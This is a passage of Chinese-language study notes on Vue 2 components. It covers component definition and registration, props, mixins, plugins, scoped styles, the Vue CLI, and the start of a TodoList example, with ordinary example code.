    1. 理解:用来实现局部(特定)功能效果的代码集合 (html/css/js/image…)

    2. 为什么:一个界面的功能很复杂

    3. 作用:复用编码,简化项目编码,提高运行效率

    模块化

    ​当应用中的 js 都以模块来编写的,那这个应用就是一个模块化的应用。

    组件化

    ​当应用中的功能都是多组件的方式来编写的,那这个应用就是一个组件化的应用。

    二、非单文件组件

    054 非单文件组件

    Vue 中使用组件的三大步骤:

    • 定义组件(创建组件)

    • 注册组件

    • 使用组件(写组件标签)

    一、如何定义一个组件?

    ​使用 vue.extend(options) 创建,其中 optionsnew vue(options) 时传入的那个 options 几乎一样,但也有点区别:

    ​区别如下:

    • el 不要写,为什么?
      • 最终所有的组件都要经过一个 vm 的管理,由 vm 中的 el 决定服务哪个容器。
    • data 必须写成函数,为什么?
      • 避免组件被复用时,数据存在引用关系。
    • 备注:使用 template 可以配置组件结构。

    二、如何注册组件?

    • 局部注册:靠 new Vue 的时候传入 components 选项
    • 全局注册:Vue.component('组件名', 组件)

    三、编写组件标签:

    • <school></school>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    <div id="root">
    <hello></hello>
    <hr>
    <h1>{{msg}}</h1>
    <school></school>
    <hr>
    <student></student>
    </div>
    <div id="root2">
    <hello></hello>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建组件
    const school = Vue.extend({
    template: `<div><h1>学校名称:{{name}}</h1><h1>学校地址:{{address}}</h1></div>`,
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    }
    })

    const student = Vue.extend({
    template: `<div><h1>学生名称:{{name}}</h1><h1>学生年龄:{{age}}</h1></div>`,
    data() {
    return {
    name: '古尔丹',
    age: 16
    }
    }
    })

    const hello = Vue.extend({
    template: `<h1>你好,旅行者。</h1>`
    })

    Vue.component('hello', hello) // 全局注册
    // 创建 Vue 实例
    const vm = new Vue({
    el: '#root',
    data: {
    msg: '你好啊朋友!'
    },
    components: {
    school, // 相当于 school: school
    student
    }
    })
    </script>

    055 组件的几个注意点

    几个注意点:

    1. 关于组件名:

      • 一个单词组成:

        第一种写法(首字母小写):school

        第二种写法(首字母大写):School

      • 多个单词组成:

        第一种写法(kebab-case 命名):my-school

        第二种写法(CamelCase 命名):MySchool(需要 Vue 脚手架支持)

      • 备注

        • 组件名尽可能回避 HTML 中已有的元素名称,例如:h2H2 都不行。
        • 可以使用 name 配置项指定组件在开发者工具中呈现的名字。
    2. 关于组件标签:
      第一种写法:<school></school>

      第二种写法:<school/>

      备注:不用使用脚手架时,<school/> 会导致后续组件不能染

    3. 一个简写方式:
      const school = Vue.extend(options) 可简写为:const school = options

    056 组件的嵌套

    ​建立如下的组件结构:

    classDiagram    class Student {        +String name        +int age        +data()    }    class School {        +String name        +String address        +data()        +components: Student    }    class Hello {        +String template    }    class App {        +String template        +components: Hello, School    }    class VueInstance {        +components: App    }    Student --> School : nested    School --> App : used in    Hello --> App : used in    App --> VueInstance : root component
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    <div id="root"></div>

    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建组件
    const student = Vue.extend({
    template: `<div><h1>学生名称:{{name}}</h1><h1>学生年龄:{{age}}</h1></div>`,
    data() {
    return {
    name: '古尔丹',
    age: 16
    }
    },
    })

    const school = Vue.extend({
    template: `<div>
    <h1>学校名称:{{name}}</h1>
    <h1>学校地址:{{address}}</h1>
    <student></student>
    </div>`,
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    },
    components: {
    student
    }
    })

    const hello = Vue.extend({
    template: `<h1>你好,旅行者。</h1>`
    })

    const app = Vue.extend({
    template: `<div><hello/><school/></div>`,
    components: {
    school,
    hello
    }
    })

    // 创建 Vue 实例
    const vm = new Vue({
    el: '#root',
    template: `<app/>`,
    components: {
    app,
    }
    })
    </script>

    057 VueComponent 构造函数 & 058 Vue 实例与组件实例

    关于 VueComponent

    1. school 组件本质是一个名为 Vuecomponent 的构造函数,且不是程序员定义的,是 Vue.extend 生成的。

    2. 我们只需要写 <school/><school></school>,Vue 解析时会帮我们创建 school 组件的实例对象,即 Vue 帮我们执行的:newVueComponent(options)

    3. 特别注意:每次调用 Vue.extend,返回的都是一个全新的 Vuecomponent!!!

    4. 关于 this 指向:

      • 组件配置中:
        data 函数、methods 中的函数、watch 中的函数、computed 中的函数 它们的 this 均是 Vuecomponent 实例对象
      • new Vue(options) 配置中:
        data 函数、methods 中的函数、watch 中的函数、computed 中的函数 它们的 this 均是 Vue 实例对象
    5. VueComponent 的实例对象,以后简称 vc(也可称之为:组件实例对象)。

      Vue 的实例对象,以后简称 vm

    059 一个重要的内置关系

    ​在 JavaScript 中,"显示原型属性"和"隐式原型属性"是两个不同的概念,涉及到对象的继承和原型链的机制。为了更好地理解这些概念,我们需要先了解原型链以及如何通过原型来实现继承。

    1. 隐式原型属性(__proto__

    定义:

    ​隐式原型属性指的是每个 JavaScript 对象内部都有一个隐式的 __proto__ 属性。它指向对象的构造函数的原型对象(即该对象的父类)。

    特点:
    • __proto__ 不是显式声明的,而是 JavaScript 引擎自动添加到每个对象内部的一个隐藏属性。
    • __proto__ 连接对象与其构造函数的原型对象,是实现原型链继承的基础。
    • 每个对象都有自己的原型对象,原型对象又有自己的原型,形成原型链。当访问对象的属性或方法时,JavaScript 会沿着原型链查找。
    示例:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    javascriptCopy Codefunction Person(name) {
    this.name = name;
    }

    Person.prototype.sayHello = function() {
    console.log('Hello, ' + this.name);
    };

    const p1 = new Person('John');
    console.log(p1.__proto__ === Person.prototype); // true

    ​在上面的代码中,p1.__proto__Person.prototype,即 p1 对象的原型。

    2. 显示原型属性(prototype

    定义:

    ​显示原型属性是指构造函数(类)的 prototype 属性。每个函数对象都有一个 prototype 属性,这个属性指向构造函数的原型对象。通过 prototype 属性可以定义构造函数实例共享的属性和方法。

    特点:
    • 构造函数的 prototype 属性用于定义所有实例对象共享的方法或属性。
    • 当你通过构造函数创建实例时,实例对象会通过 __proto__ 指向构造函数的 prototype
    示例:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    javascriptCopy Codefunction Person(name) {
    this.name = name;
    }

    Person.prototype.sayHello = function() {
    console.log('Hello, ' + this.name);
    };

    const p1 = new Person('John');
    const p2 = new Person('Jane');
    p1.sayHello(); // "Hello, John"
    p2.sayHello(); // "Hello, Jane"

    ​在这个例子中,Person.prototypePerson 函数的原型对象,sayHello 方法定义在该原型对象上,p1p2 实例通过 __proto__ 访问到 Person.prototype,从而能够共享该方法。

    总结

    • 隐式原型属性(__proto__:是每个对象自动拥有的属性,指向该对象的构造函数的原型。
    • 显示原型属性(prototype:是每个构造函数自动拥有的属性,指向一个对象,这个对象包含了所有通过该构造函数创建的实例共享的属性和方法。

    ​通过这两种原型属性,JavaScript 实现了基于原型链的继承机制。

    webp

    三、单文件组件

    060 单文件组件 & 061 创建 Vue 脚手架 & 062 分析脚手架结构

    ​Vue 脚手架是 Vue 官方提供的标准化开发工具(开发平台)。

    ​安装:

    1
    npm install -g @vue/cli

    ​创建一个项目(选择 Vue2):

    1
    vue create vue_test

    ​启动服务器:

    1
    2
    cd vue_test
    npm run serve

    webp

    Babel 是一个广泛使用的 JavaScript 编译器,主要用于将现代 JavaScript(ES6+)代码转换为向后兼容的版本,以便可以在旧版本的浏览器或环境中运行。它支持的主要功能包括:

    1. 语法转换:将新版本的 JavaScript 语法(如箭头函数、模块化等)转换为旧版兼容的语法。
    2. Polyfills:通过插件(如 @babel/preset-envcore-js),可以添加对新 API(如 PromiseArray.prototype.includes 等)的支持。
    3. TypeScript 支持:Babel 可以处理 TypeScript 代码,将其编译为纯 JavaScript。
    4. React 支持:通过 @babel/preset-react,Babel 可以编译 JSX 语法。
    5. 自定义插件:支持通过编写插件来扩展 Babel 的功能。

    Babel 通常用于构建工具(如 Webpack、Rollup)中,配合其他工具实现现代开发。

    ESLint 是一个 JavaScript 的静态代码分析工具,用于查找代码中的问题,并帮助开发者遵循一致的代码风格。它的主要特点包括:

    1. 发现问题:可以发现语法错误、潜在问题(如未定义的变量)以及最佳实践建议。
    2. 代码风格:支持检查代码格式(如缩进、引号、分号等),并强制团队遵守一致的代码风格。
    3. 可定制规则:通过配置文件(如 .eslintrc),开发者可以启用或禁用特定规则。
    4. 插件扩展:支持社区插件(如 React、Vue 等插件)来检查特定框架的代码。
    5. 自动修复:ESLint 可以自动修复一些简单的代码问题,例如格式不一致。
    6. 与编辑器集成:通过插件,可以在编辑器(如 VS Code)中实时查看代码问题。

    ESLint 通常与 Babel 或 TypeScript 配合使用,在开发和 CI/CD 流程中确保代码质量。

    特性BabelESLint
    用途转换代码以支持旧环境分析代码并强制执行一致性和质量
    目标编译现代 JavaScript 到兼容版本发现潜在错误和代码风格问题
    执行时机构建时开发时或代码审查阶段
    扩展性插件和预设支持复杂的语法转换插件支持多种框架和编码风格检查

    总结

    • Babel 是工具链中的“编译器”,确保代码能在目标环境运行。
    • ESLint 是工具链中的“检查员”,确保代码高质量并易于维护。

    ​VSCode 中按下 Ctrl + ` 键可以打开终端。

    ​调整项目的文件结构:

    • vue_test
      • node_modules
      • public
        • favicon.ico
        • index.html
      • src
        • assets
          • logo.png
        • components
          • School.vue
          • Student.vue
        • App.vue
        • main.js

    ​修改文件中的内容:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    <!DOCTYPE html>
    <html lang="">
    <head>
    <meta charset="utf-8">
    <!-- 针对 IE 浏览器的一个特殊配置,含义是让 IE 浏览器以最高的渲染级别渲染页面 -->
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- 开启移动端的理想视口 -->
    <meta name="viewport" content="width=device-width,initial-scale=1.0">
    <!-- 配置页签图标 -->
    <link rel="icon" href="<%= BASE_URL %>favicon.ico">
    <!-- 配置网页标题 -->
    <title><%= htmlWebpackPlugin.options.title %></title>
    </head>
    <body>
    <!-- 当浏览器不支持 js 时,noscript 中的元素就会被渲染 -->
    <noscript>
    <strong>We're sorry but <%= htmlWebpackPlugin.options.title %> doesn't work properly without JavaScript enabled. Please enable it to continue.</strong>
    </noscript>
    <!-- 容器 -->
    <div id="app"></div>
    <!-- built files will be auto injected -->
    </body>
    </html>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    <template>
    <div class="demo">
    <h2>学校名称:{{name}}</h2>
    <h2>学校地址:{{address}}</h2>
    <button @click="showName">点我提示学校名</button>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'School',
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    },
    methods: {
    showName() {
    alert(this.name)
    }
    }
    }
    </script>

    <style>
    .demo {
    background-color: orange;
    }
    </style>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    <template>
    <div>
    <h2>学生姓名:{{name}}</h2>
    <h2>学生年龄:{{age}}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '张三',
    age: 18
    }
    }
    }
    </script>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    <template>
    <div>
    <img src="./assets/logo.png" alt="logo">
    <School></School>
    <Student></Student>
    </div>
    </template>

    <script>
    import School from './components/School.vue';
    import Student from './components/Student.vue';

    export default {
    name: 'App',
    components: {
    School,
    Student
    }
    }
    </script>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    // 该文件是整个项目的入口文件

    // 引入 Vue
    import Vue from 'vue'
    // 引入 App 组件,它是所有组件的父组件
    import App from './App.vue'
    // 关闭 Vue 的生产提示
    Vue.config.productionTip = false

    // 创建 Vue 实例对象 vm
    new Vue({
    el: '#app',
    render: h => h(App),
    })

    ​执行下列语句编译:

    1
    npm run serve

    webp

    063 render 函数

    ​为什么 main.js 里要用:

    1
    2
    3
    4
    5
    // 创建 Vue 实例对象 vm
    new Vue({
    el: '#app',
    render: h => h(App),
    })

    ​而不是:

    1
    2
    3
    4
    new Vue({
    el: '#app',
    template: `<app></app>`
    })

    ​?这是因为 main.js 中引用的不是完整版的 Vue。

    关于不同版本的 Vue:

    1. vue.jsvue.runtime.xxx.js 的区别:
      • vue.js 是完整版的 Vue,包含:核心功能 + 模板解析器。
      • vue.runtime.xxx.js 是运行版的 Vue,只包含:核心功能;没有模板解析器。
    2. 因为 vue.runtime.xxx.js 没有模板解析器,所以不能使用 template 配置项,需要使用 render 函数接收到的 createElement 函数去指定具体内容。

    064 修改默认配置

    下列命令输出配置文件:
    1
    vue inspect > output.js

    ​也可通过 vue.config.js 来修改默认配置:

    1
    2
    3
    4
    5
    6
    7
    8
    module.exports = {
    pages: {
    index: {
    // 入口
    entry: 'erc/XXX.js'
    }
    }
    }

    065 ref 属性

    1. 被用来给元素或子组件注册引用信息(id 的替代者)

    2. 应用在 html 标签上获取的是真实 DOM 元素,应用在组件标签上是组件实例对象(vc)

    3. 使用方式:

      打标识:<h1 ref="xxx">.....</h1><School ref="xxx"></School>

      获取:this.$refs.xxx

    webp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    <template>
    <div>
    <h1 v-text="msg" ref="title"></h1>
    <button ref="btn" @click="showDOM">点我输出信息</button>
    <School ref="sch"/>
    </div>
    </template>

    <script>
    // 引入 School 组件
    import School from './components/School.vue';

    export default {
    name: 'App',
    components: {School},
    data() {
    return {
    msg: '你好啊朋友!'
    }
    },
    methods: {
    showDOM() {
    console.log(this.$refs.title)
    console.log(this.$refs.btn)
    console.log(this.$refs.sch)
    }
    },
    }
    </script>

    066 props 配置

    ​配置项 props

    ​功能:让组件接收外部传过来的数据

    1. 传递数据:

      1
      <Demo name="xxx"/>
    2. 接收数据:

      第一种方式(只接收):

      1
      props:['name']

      第二种方式(限制类型):

      1
      props: {name: Number}

      第三种方式(限制类型、限制必要性、指定默认值):

      1
      2
      3
      4
      5
      6
      7
      props: {
      name: {
      type: String, // 类型
      required: true, // 必要性
      default: '老王' // 默认值
      }
      }

    ​备注:props 是只读的,Vue 底层会监测你对 props 的修改,如果进行了修改,就会发出警告,若业务需求确实需要修改,那么请复制 props 的内容到 data 中一份,然后去修改 data 中的数据。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    <template>
    <div>
    <Student name="吉安娜" sex="女" :age="18"></Student>
    <hr>
    <Student name="古尔丹" sex="女" :age="30"></Student>
    </div>
    </template>

    <script>
    import Student from './components/Student.vue'

    export default {
    name: 'App',
    components: {
    Student
    }
    }
    </script>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    <template>
    <div>
    <h1>{{ msg }}</h1>
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    <h2>学生年龄:{{ age }}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    console.log(this)
    return {
    msg: '你好,旅行者。'
    }
    },
    props: ['name', 'age', 'sex']
    }
    </script>

    067 mixin 混入

    ​如果多个 Vue 组件要共用一个属性,可以使用 mixin 混入,将共用的部分用一个 js 文件存储。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    export const hunhe = {
    methods: {
    showName() {
    alert(this.name)
    }
    },
    mounted() {
    console.log('嗬,你好!')
    }
    }

    局部混入

    ​下面使用在 Student.vueSchool.vue 文件下混入。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    <template>
    <div>
    <Student></Student>
    <hr>
    <School></School>
    </div>
    </template>

    <script>
    import Student from './components/Student.vue'
    import School from './components/School.vue'

    export default {
    name: 'App',
    components: {
    Student,
    School
    }
    }
    </script>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    <template>
    <div>
    <h2 @click="showName">学生名称:{{name}}</h2>
    <h2>学生性别:{{sex}}</h2>
    </div>
    </template>

    <script>
    import {hunhe} from '../mixin.js'
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '古尔丹',
    sex: 'Male'
    }
    },
    mixins: [hunhe]
    }
    </script>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    <template>
    <div>
    <h2 @click="showName">学校名称:{{name}}</h2>
    <h2>学校地址:{{address}}</h2>
    </div>
    </template>

    <script>
    import {hunhe} from '../mixin.js'
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    },
    mixins: [hunhe]
    }
    </script>

    全局混入

    ​下面使用在 main.js 文件下混入。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import Vue from 'vue'
    import App from './App.vue'
    import { hunhe } from './mixin'

    Vue.config.productionTip = false
    Vue.mixin(hunhe)

    new Vue({
    render: h => h(App),
    }).$mount('#app')
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    <template>
    <div>
    <h2 @click="showName">学生名称:{{name}}</h2>
    <h2>学生性别:{{sex}}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '古尔丹',
    sex: 'Male'
    }
    },
    mixins: [hunhe]
    }
    </script>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    <template>
    <div>
    <h2 @click="showName">学校名称:{{name}}</h2>
    <h2>学校地址:{{address}}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: 'FJNU',
    address: 'Fuzhou'
    }
    },
    mixins: [hunhe]
    }
    </script>

    068 插件

    ​功能:用于增强 Vue。

    ​本质:包含 install 方法的一个对象,install 的第一个参数是 Vue,第二个以后的参数是插件使用者传递的数据。

    ​定义插件:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    对象.install = function(Vue, options) {
    // 1.添加全局过滤器(这在 Vue3 中被弃用)
    Vue.filter(....)
    // 2.添加全局指令
    Vue.directive(....)
    // 3.配置全局混入(合)
    Vue.mixin(....)
    // 4.添加实例方法
    Vue.prototype.$myMethod = function(){...}
    Vue.prototype.$myProperty = xxxx
    }

    ​使用插件:Vue.use()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    // 引入 Vue
    import Vue from 'vue'
    // 引入 App
    import App from './App.vue'
    // 引入插件
    import plugins from './plugins'
    // 关闭 Vue 的生产提示
    Vue.config.productionTip = false

    // 应用(使用)插件
    Vue.use(plugins, 1, 2, 3)
    // 创建 vm
    new Vue({
    el: '#app',
    render: h => h(App)
    })
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    export default {
    install(Vue, x, y, z) {
    console.log(x, y, z)
    // 全局过滤器
    Vue.filter('mySlice', function (value) {
    return value.slice(0, 4)
    })

    // 定义全局指令
    Vue.directive('fbind', {
    // 指令与元素成功绑定时(一上来)
    bind(element, binding) {
    element.value = binding.value
    },
    // 指令所在元素被插入页面时
    inserted(element) {
    element.focus()
    },
    // 指令所在的模板被重新解析时
    update(element, binding) {
    element.value = binding.value
    }
    })

    // 定义混入
    Vue.mixin({
    data() {
    return {
    x: 100,
    y: 200
    }
    },
    })

    // 给 Vue 原型上添加一个方法(vm 和 vc 就都能用了)
    Vue.prototype.hello = () => { alert('你好啊') }
    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    <template>
    <div>
    <h2>学校名称:{{ name | mySlice }}</h2>
    <h2>学校地址:{{ address }}</h2>
    <button @click="test">点我测试一个hello方法</button>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'School',
    data() {
    return {
    name: '尚硅谷atguigu',
    address: '北京',
    }
    },
    methods: {
    test() {
    this.hello()
    }
    },
    }
    </script>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    <template>
    <div>
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    <input type="text" v-fbind:value="name">
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '张三',
    sex: '男'
    }
    },
    }
    </script>

    webp

    069 scoped 样式

    <style lang="less" scoped> 可以设定样式语言为 css,scoped 可以设定样式作用范围在文件内。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    // 引入 Vue
    import Vue from 'vue'
    // 引入 App
    import App from './App.vue'
    // 关闭 Vue 的生产提示
    Vue.config.productionTip = false

    // 创建 vm
    new Vue({
    el: '#app',
    render: h => h(App)
    })
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    <template>
    <div class="demo">
    <h2 class="school">学校名称:{{ name }}</h2>
    <h2>学校地址:{{ address }}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'School',
    data() {
    return {
    name: '河百带学',
    address: '河北保定',
    }
    },
    }
    </script>

    <style lang="less" scoped>
    .demo {
    background-color: orange;
    .school {
    font-size: larger;
    }
    }
    </style>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    <template>
    <div class="demo">
    <h2>学生姓名:{{ name }}</h2>
    <h2>学生性别:{{ sex }}</h2>
    </div>
    </template>

    <script>
    /* eslint-disable vue/multi-word-component-names */
    export default {
    name: 'Student',
    data() {
    return {
    name: '张三',
    sex: '男'
    }
    },
    }
    </script>

    <style lang="less" scoped>
    .demo {
    background-color: skyblue;
    }
    </style>

    070-077 TodoList 案例

    1. 组件化编码流程

      • 拆分静态组件:组件要按照功能点拆分,命名不要与 html 元素冲突

      • 实现动态组件:考虑好数据的存放位置,数据是一个组件在用,还是一些组件在用:

        • 一个组件在用:放在组件自身即可。
        • 一些组件在用:放在他们共同的父组件上(状态提升
        • 实现交互:从绑定事件开始。
    2. props 适用于:

      • 父组件 ==> 子组件 通信
      • 子组件 ==> 父组件 通信(要求父先给子一个函数)
      • 使用 v-model 时要切记:v-model 绑定的值不能是 props 传过来的值,因为 props 是不可以修改的!
      • props 传过来的若是对象类型的值,修改对象中的属性时 Vue 不会报错,但不推荐这样做。

    webp

    • 父组件组织整个 TodoList 的结构。将所有数据存在 data() 中的 todos 中。
    • 处理 todos 的相关函数也在整个父组件中。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    <template>
    <div id="root">
    <div class="todo-container">
    <div class="todo-wrap">
    <MyHeader :addTodo="addTodo" />
    <MyList :todos="todos" :checkTodo="checkTodo" :deleteTodo="deleteTodo" />
    <MyFooter :todos="todos" :checkAllTodo="checkAllTodo" :clearAllTodo="clearAllTodo" />
    </div>
    </div>
    </div>
    </template>

    <script>
    import MyHeader from './components/MyHeader'
    import MyList from './components/MyList'
    import MyFooter from './components/MyFooter.vue'

    export default {
    name: 'App',
    components: { MyHeader, MyList, MyFooter },
    data() {
    return {
    // 由于 todos 是 MyHeader 组件和 MyFooter 组件都在使用,所以放在 App 中(状态提升)
    todos: [
    { id: '001', title: '抽烟', done: true },
    { id: '002', title: '喝酒', done: false },
    { id: '003', title: '开车', done: true }
    ]
    }
    },
    methods: {
    // 添加一个 todo
    addTodo(todoObj) {
    this.todos.unshift(todoObj)
    },
    // 勾选 or 取消勾选一个 todo
    checkTodo(id) {
    this.todos.forEach((todo) => {
    if (todo.id === id) todo.done = !todo.done
    })
    },
    // 删除一个 todo
    deleteTodo(id) {
    this.todos = this.todos.filter(todo => todo.id !== id)
    },
    // 全选 or 取消全选
    checkAllTodo(done) {
    this.todos.forEach((todo) => {
    todo.done = done
    })
    },
    // 清除所有已经完成的 todo
    clearAllTodo() {
    this.todos = this.todos.filter((todo) => {
    return !todo.done
    })
    }
    }
    }
    </script>

    <style>
    /*base*/
    body {
    background: #fff;
    }

    .btn {
    display: inline-block;
    padding: 4px 12px;
    margin-bottom: 0;
    font-size: 14px;
    line-height: 20px;
    text-align: center;
    vertical-align: middle;
    cursor: pointer;
    box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05);
    border-radius: 4px;
    }

    .btn-danger {
    color: #fff;
    background-color: #da4f49;
    border: 1px solid #bd362f;
    }

    .btn-danger:hover {
    color: #fff;
    background-color: #bd362f;
    }

    .btn:focus {
    outline: none;
    }

    .todo-container {
    width: 600px;
    margin: 0 auto;
    }

    .todo-container .todo-wrap {
    padding: 10px;
    border: 1px solid #ddd;
    border-radius: 5px;
    }
    </style>
    • 使用 v-for 创建若干 todoObj,使得列表中有多个表项。

    • 使用 props 接收 App 传递过来的数据,实现组件之间的数据传递。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    <template>
    <ul class="todo-main">
    <MyItem v-for="todoObj in todos" :key="todoObj.id" :todo="todoObj" :checkTodo="checkTodo"
    :deleteTodo="deleteTodo" />
    </ul>
    </template>

    <script>
    import MyItem from './MyItem'

    export default {
    name: 'MyList',
    components: { MyItem },
    // 声明接收 App 传递过来的数据,其中 todos 是自己用的,checkTodo 和 deleteTodo 是给子组件 MyItem 用的
    props: ['todos', 'checkTodo', 'deleteTodo']
    }
    </script>

    <style scoped>
    /*main*/
    .todo-main {
    margin-left: 0px;
    border: 1px solid #ddd;
    border-radius: 2px;
    padding: 0px;
    }

    .todo-empty {
    height: 40px;
    line-height: 40px;
    border: 1px solid #ddd;
    border-radius: 2px;
    padding-left: 5px;
    margin-top: 10px;
    }
    </style>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    <template>
    <li>
    <label>
    <input type="checkbox" :checked="todo.done" @change="handleCheck(todo.id)"/>
    <!-- 如下代码也能实现功能,但是不太推荐,因为有点违反原则,因为修改了 props -->
    <!-- <input type="checkbox" v-model="todo.done"/> -->
    <span>{{todo.title}}</span>
    </label>
    <button class="btn btn-danger" @click="handleDelete(todo.id)">删除</button>
    </li>
    </template>

    <script>
    export default {
    name:'MyItem',
    // 声明接收 todo、checkTodo、deleteTodo
    props:['todo','checkTodo','deleteTodo'],
    methods: {
    // 勾选 or 取消勾选
    handleCheck(id){
    //通知 App 组件将对应的 todo 对象的 done 值取反
    this.checkTodo(id)
    },
    // 删除
    handleDelete(id){
    if(confirm('确定删除吗?')){
    // 通知 App 组件将对应的 todo 对象删除
    this.deleteTodo(id)
    }
    }
    },
    }
    </script>

    <style scoped>
    /*item*/
    li {
    list-style: none;
    height: 36px;
    line-height: 36px;
    padding: 0 5px;
    border-bottom: 1px solid #ddd;
    }

    li label {
    float: left;
    cursor: pointer;
    }

    li label li input {
    vertical-align: middle;
    margin-right: 6px;
    position: relative;
    top: -1px;
    }

    li button {
    float: right;
    display: none;
    margin-top: 3px;
    }

    li:before {
    content: initial;
